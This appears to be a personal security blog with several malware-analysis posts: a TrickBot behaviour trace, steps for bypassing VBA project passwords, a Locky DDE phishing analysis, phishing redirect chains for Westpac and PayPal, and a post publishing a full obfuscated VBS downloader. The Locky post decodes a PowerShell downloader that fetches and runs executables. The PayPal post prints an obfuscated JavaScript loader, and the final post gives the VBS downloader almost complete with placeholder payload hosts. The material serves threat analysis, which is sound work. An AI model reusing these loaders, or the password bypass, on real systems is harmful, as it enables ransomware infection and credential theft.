Wednesday, January 10, 2018

Python - useful links

http://timgolden.me.uk/python/wmi/cookbook.html

wmi Cookbook

These examples assume you are using the WMI module from this site. The following are examples of useful things that could be done with this module on win32 machines. It hardly scratches the surface of WMI, but that’s probably as well.

The following examples, except where stated otherwise, all assume that you are connecting to the current machine. To connect to a remote machine, simply specify the remote machine name in the WMI constructor, and by the wonders of DCOM, all should be well:

Share:

Monday, December 18, 2017

Malware - TrickBot Analysis December 2017

What's new:

New Execution flow - directory structure has changed.
Instead of the winapp folder, you need to look for this:

C:\Users\me\AppData\Roaming\services\
C:\Users\me\AppData\Roaming\services\Modules

And of course, new icon :)


 

 

Identifiers:


Microsoft Visual Basic v5.0/v6.0

Imports:
MSVBVM60.DLL  - 70 functions

1 VERSIONINFO
FILEVERSION 5,0,0,0
PRODUCTVERSION 5,0,0,0
FILEOS 0x4
FILETYPE 0x1
{
BLOCK "StringFileInfo"
{
    BLOCK "040904B0"
    {
        VALUE "CompanyName", "Thadickatt House"
        VALUE "FileDescription", "Pil, ecco quanto produce il Sistema Umbria"
        VALUE "LegalCopyright", "Copyright © 2017 - DUESSE COMMUNICATION S.r.l"
        VALUE "LegalTrademarks", "Edah, should not be confused with the Haredi communal body in Israel known as the Edah"
        VALUE "ProductName", "Thadickat"
        VALUE "FileVersion", "5.00"
        VALUE "ProductVersion", "5.00"
        VALUE "InternalName", "Thadickat"
        VALUE "OriginalFilename", "Thadickat.exe"
    }
}

BLOCK "VarFileInfo"
{
    VALUE "Translation", 0x0409 0x04B0 
}
}


FLOW:

Load Image
C:\Windows\SysWOW64\kernel32.dll






Load Image
C:\Windows\SysWOW64\KernelBase.dll






RegOpenKey
HKLM\System\CurrentControlSet\Control\Terminal Server






RegOpenKey
HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\Safer\CodeIdentifiers






Load Image
C:\Windows\SysWOW64\apphelp.dll






RegOpenKey
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Disable8And16BitMitigation






CreateFile
C:\Windows\SysWOW64\rpcss.dll






RegOpenKey
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager






RegCloseKey
HKLM\Software\Wow6432Node\Microsoft\Cryptography\Offload






CreateFile
C:\Users\Vishal Thakur\AppData\Local\Temp\~DF77D59600395B2DB0.TMP






RegOpenKey
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions






RegOPenKey
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\KnownFolders






CreateFile
C:\Users\Vishal Thakur\AppData\Roaming






CreateFile
C:\Users\Vishal Thakur\AppData\Roaming\services






CreateFile
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe






CreateFile
C:\Windows\SysWOW64\ntmarta.dll






SetEndOfFileInformationFile
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe






WriteFile
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe






Thread Exit






Process Exit






CloseFile






RegOpenKey
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Uiaejdlat.exe






CreateFile
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe















*Uiaejdlat.exe will obviously change with every binary - lookout for the reg entries and file creations.

Share:

Monday, December 4, 2017

Cracking password protected VBA Project code - macro code in complex encryption

It's pretty well documented on the internet how you can crack a password protected project code in office documents. It works almost in all cases :)

If the document is protected using a different scheme, you will not find the DPB entry for password in the hex code. This becomes a bit of an annoyance.

Here's how to crack quickly.

The file asks for a password when you try to look into the project code.












1. Save the file on your desktop.







Try to load this into a hex editor and see if you can find the DPB entry - you won't.

























Now follow on to the next step.

2. Change the file extention to 'zip'















3. Now simply double-click on this archive to enter the compressed file.











You will see a bunch of stuff. Go into the 'word' folder and look for the .bin file.




















Now, copy the bin file (vbaProject.bin) to a different location and open it  in your favourite hex editor and search for DPB.























You will find it now.

Change this to DPx and save the file.











4. Now, replace the bin file in the archive with this new file that you just saved. Note that we are not unzipping the file at any point.

5. Move back up and rename the file extention back to .doc from .zip.

6. Now open this file in word - it will throw a bunch of errors, just click through them.

7. Now, when you go into the project, it will not ask you for a password, but will still not shoew you the code. That's ok, its expected. Don't panic, just go into the project properties and give it a new password. Save and exit.

8. Re-launch the file in Word - go to the project, it'll ask you for a password. Give it the new password that you set.

9. Enjoy.

:)

Share:

Thursday, October 19, 2017

DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis

This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.

Flow:
Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute

Email:
Subject: Emailed Invoice - *
Attachment: l_123456.doc-

Downloader:
FileName: I_099292.doc


MD5: 0910541c2ac975a49a28d7a939e48cd3
SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a
SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126

DDE Flow:

1. Open the doc
2. This msg pops up:



3. Nothing on the first page:
 

 4. Scroll to the end:

 

5. This is the DDE code:










6. Toggle code:

 




7. This should give you the actual code:
 


This downloader was found to be serving Locky.


The above DDE code reaches out and grabs the string from arkberg-design*fi, which is Base64 encoded:

*DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwBoAGEAbQBhAG4AaQBjAC0AZQB4AHQAcgBhAGMAdABzAC4AYgBpAHoALwBlAHUAcgBnAGYAOAAzADcAbwByACIALAAiAGgAdAB0AHAAOgAvAC8AYwBlAG4AdAByAGEAbABiAGEAcAB0AGkAcwB0AGMAaAB1AHIAYwBoAG4AagAuAG8AcgBnAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiACwAIgAiACwAIgBoAHQAdABwADoALwAvAGMAbwBuAHgAaQBiAGkAdAAuAGMAbwBtAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQA*cgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIA*AkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAHIAZQBrAGEAawB2AGEAMwAyAC4AZQB4AGUAIgAJAA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAGYAcAANAAoACQAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA0ACgAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAGYAcAApAA0ACgAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAANAAoACQBiAHIAZQBhAGsADQAKAH0ADQAKAEMAYQB0AGMAaAANAAoAewANAAoAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoADQAKAAkADQAKAH0ADQAKAA==*

Decoded:


$urls = "hxxp://shamanic-extracts.biz/ eurgf837or","hxxp://centralbaptistchurchnj.org/ eurgf837or","","hxxp://conxibit.com/ eurgf837or"

foreach($url in $urls){

Try

{

                Write-Host $url  

                $fp = "$env:temp\rekakva32.exe"

                Write-Host $fp

                $wc = New-Object System.Net.WebClient

                $wc.DownloadFile($url, $fp)

                Start-Process $fp

                break

}

Catch

{

   Write-Host $_.Exception.Message

}



               

}


The payload is Locky.



:)
























Share:

Wednesday, September 27, 2017

Phishing - google redirect function used in link for phising WestPac bank

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake westpac page.
Just another phishing email with a twist.


Share:

Tuesday, September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything. 

Syntax Highlighting:

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f;  apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

function f8ce53222(ll1u8137, rx3oj311) {
  var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
  for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
  for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
  for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
  return jxl077g53
}

var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser


var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");

*/ zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>

</body>
</html>
Share:

Monday, September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in simple VBS, launched by WScript on a Win host. 

Currently serving Locky Ransomware


Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if

       

    End Function
   
Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function




Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

  UltraXgettingBelish = "User"




Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")   
End Function

 Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

  Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)


 UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function


Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object  

Advancedmantel2 ="Microsoft." + Advancedmantel2+  "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"


Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ),  TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8   

End Function


Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function


Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send
   
End Function
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")



  Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i  = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
  End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

   


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))


Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then
   
   
mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if   


Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
   
   
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
   
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
   
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 Valery = 89210


UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg
   
    For i = 1 To UBound(Flag1, 2)
       
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
   
End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"

rdde = 19


lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume  next

Valery =  Valery +33
 UltraXgetting4 = MarketPlace + mual(i)
 UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
dr1=2

rdde = rdde + 91


SetUA()
UltraXgettingFuks " d "
If UltraXgettingRickyTIcky.Status +3 = 203 Then
UltraXgettingstatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
 UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis

F3 "",4
StateUovertakes4000.Type = 1
 StateUovertakes4000.Open
StateUovertakesgetting2 22
WriteCD StateUovertakes4000,UltraXgettingResponseBody
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040  < UltraXgettingJohnSnowu Then
  drba =55
 UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"
End If
 


triada = 341
end if


Share: